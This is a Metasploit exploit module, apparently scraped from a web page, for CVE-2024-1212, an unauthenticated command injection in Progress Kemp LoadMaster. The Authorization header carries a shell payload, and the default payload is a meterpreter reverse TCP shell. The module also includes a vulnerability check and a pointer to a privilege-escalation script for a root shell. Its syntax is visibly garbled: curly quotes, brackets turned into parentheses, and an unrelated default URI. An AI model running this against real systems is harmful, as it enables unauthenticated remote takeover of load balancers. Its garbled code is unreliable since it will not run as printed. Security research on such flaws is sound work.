Kemp LoadMaster Unauthenticated Command Injection
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
prepend Msf::Exploit::Remote::AutoCheck
def flag_file
return @flag_file unless @flag_file.nil?
@flag_file = '/tmp/' + Rex::Text.rand_text_alpha(5)
end
def initialize(info = {})
super(
update_info(
info,
'Name' => ‘Kemp LoadMaster Unauthenticated Command Injection’,
‘Description’ => %q{
This module exploits an unauthenticated command injection vulnerability in
Progress Kemp LoadMaster in the authorization header after vversion 7.2.48.1.
The following versions are patched: 7.2.59.2 (GA), 7.2.54.8 (LTSF) and
7.2.48.10 (LTS).
},
‘Author’ => (
‘Dave Yesland with Rhino Security Labs’,
),
‘License’ => MSF_LICENSE,
‘References’ => (
(‘CVE’, ‘2024-1212’),
(‘URL’, ‘https://rhinosecuritylabs.com/research/cve-2024-1212unauthenticated-command-injection-in-progress-kemp-loadmaster/’),
(‘URL’, ‘https://kemptechnologies.com/kemp-load-balancers’)
),
‘DisclosureDate’ => ‘2024-03-19’,
‘Notes’ => {
‘Stability’ => ( CRASH_SAFE ),
‘SideEffects’ => ( IOC_IN_LOGS, ARTIFACTS_ON_DISK),
‘Reliability’ => ( REPEATABLE_SESSION )
},
‘Platform’ => (‘unix’, ‘linux’),
‘Arch’ => (ARCH_CMD),
‘Privileged’ => false,
‘Targets’ => (
(
‘Automatic’, # Add logic to run the payload only once
{
‘Payload’ => {
‘Prepend’ => “( -f #{flag_file} ) || ( touch #{flag_file}; (sleep 60; rm #{flag_file})& “,
‘Append’ => ‘)’,
‘BadChars’ => “\x3a\x27”
}
}
),
(
‘Do_Not_Prepend_Runonce_Code’, # This will likely result in 2-3 sessions
{
‘Payload’ => {
‘BadChars’ => “\x3a\x27”
}
}
)
),
‘Default_target’ => 0,
‘DefaultOptions’ => {
‘PAYLOAD’ => ‘cmd/linux/http/x64/meterpreter_reverse_tcp’,
‘FETCH_WRITABLE_DIR’ => ‘/tmp/’,
‘SSL’ => true,
‘RPORT’ => 443
}
)
)
register_options((
OptString.new(‘TARGETURI’, (true, ‘The URI path to LoadMaster’, “https://unsafe.sh/”))
))
end
def exploit
uri = normalize_uri(target_uri.path, ‘access’, ‘set’)
vprint_status(‘Sending payload…’)
send_request_cgi({
‘method’ => ‘GET’,
‘uri’ => uri,
‘vars_get’ =>
{
‘param’ => ‘enableapi’,
‘value’ => ‘1’
},
‘authorization’ => basic_auth(“‘;#{payload.encoded};echo ‘”, Rex::Text.rand_text_alpha(rand(8..15))),
‘verify’ => false
})
end
def on_new_session(client)
super
print_good(‘Now background this session with “bg” and then run “resource run_progress_kemp_loadmaster_sudo_priv_esc_2024.rc” to get a root shell’)
end
def check
print_status(“Checking if #{peer} is vulnerable…”)
uri = normalize_uri(target_uri.path, ‘access’, ‘set’)
res = send_request_cgi({
‘method’ => ‘GET’,
‘uri’ => uri,
‘vars_get’ => {
‘param’ => ‘enableapi’,
‘value’ => ‘1’
},
‘authorization’ => basic_auth(“‘”, Rex::Text.rand_text_alpha(rand(8..15))),
‘verify’ => false
})
# No response from server
unless res
return CheckCode::Unknown
end
# Check for specific error pattern in headers or body to confirm vulnerability
if res.headers.to_s.include?(‘unexpected EOF while looking for matching’) || res.body.include?(‘unexpected EOF while looking for matching’)
return CheckCode::Vulnerable
else
return CheckCode::Safe
end
end
end
Thanks for you comment!
Your message is in quarantine 48 hours.
|
{{ x.nick }}
Date: {{ x.ux * 1000 | date:’yyyy-MM-dd’ }} {{ x.ux * 1000 | date:’HH:mm’ }} CET+1 {{ x.comment }} |
|
GIPHY App Key not set. Please check settings